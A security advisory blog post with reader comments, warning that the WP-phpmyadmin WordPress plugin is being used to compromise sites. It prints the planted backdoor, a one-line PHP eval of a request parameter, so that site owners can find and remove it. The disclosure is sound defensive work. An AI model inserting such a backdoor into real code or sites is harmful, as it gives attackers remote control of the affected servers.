If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.
On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:
<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>
This is not part of the plugin, and should be removed immediately!
The code snippet above is a backdoor and allows remote access to the affected sites with it installed.
We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.
EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:
The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.
So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.
If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.
If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.
WP Greet Box was also removed recently (probably for security reasons).
What about the plugin Portable phpMyAdmin?
That plugin fixed the security problem: http://wordpress.org/extend/plugins/portable-phpmyadmin/changelog/
Hi Otto, are you referring to Portable phpMyAdmin?
The link you posted is redirecting to the plugin directory home page.
Thanks.
Looks like plugin is back in action
We haven’t seen any security issues with that plugin Eric.
The thing to consider is that you’re giving direct access in the
WordPress dashboard to modify the database. This is a huge risk when you
consider users that aren’t experienced with this type of interaction.
If it needs to be used in a production environment, it is highly
recommended that the proper access control be applied, and that
processes be implemented around the use of the functionality.
Hope this helps!
Hi,
Thanks for the info.
I’ve had a nightmare over the last 24 hours as ALL my sites were compromised and malicious code injected into the index.php files.
I’ve now removed the phpmyadmin plugin (which had the corrupted code in the update file as you say) and all seems to be ok for the moment. Fingers crossed it stays that way.
My question is…
Could the hacker access and inject malicious code on all my sites (all on the same shared hosting server) even if the plugin was only installed on one of the domains?
I ask because I want to know if this is the only plugin causing me woe or whether there are more I need to act on.
Thanks again
D
Hey guys,
First off i completely agree that having a phpadmin plugin in the WP Dashboard is a huge risk on so many different levels. 😉 With that said, have you looked at or tested the WordPress Adminer plugin? The coding looks really solid and minus some base64 encoded images it looks really solid. Thanks.
Hi, I am very pleased with the plugin.. does exactly what i wanted. Thanks for share!
Now this plugin is removed from WordPress because it was having malicious code
my website was hacked after installing this and it said “hacked by nolov3” and my website was gone.
Doesn’t seem to be such a reliable claim. PhPMyAdmin is nowhere a low-quality malware, but instead a widely-used and quite nice tool. This article here seems to be indicating that the authors of that software deliberately wanted to do some backdoor things. This I highly doubt. http://www.phpmyadmin.net/home_page/security/ Hope more experienced people would provide some more knowledge on it.
Did you read the article? It is talking about WordPress plugin that packaged phpMyAdmin, and was insecure. They aren’t talking about the actual phpMyAdmin tool as being insecure, just the plugin.
Parabéns pelo post. Eatava a procura de um artigo assim.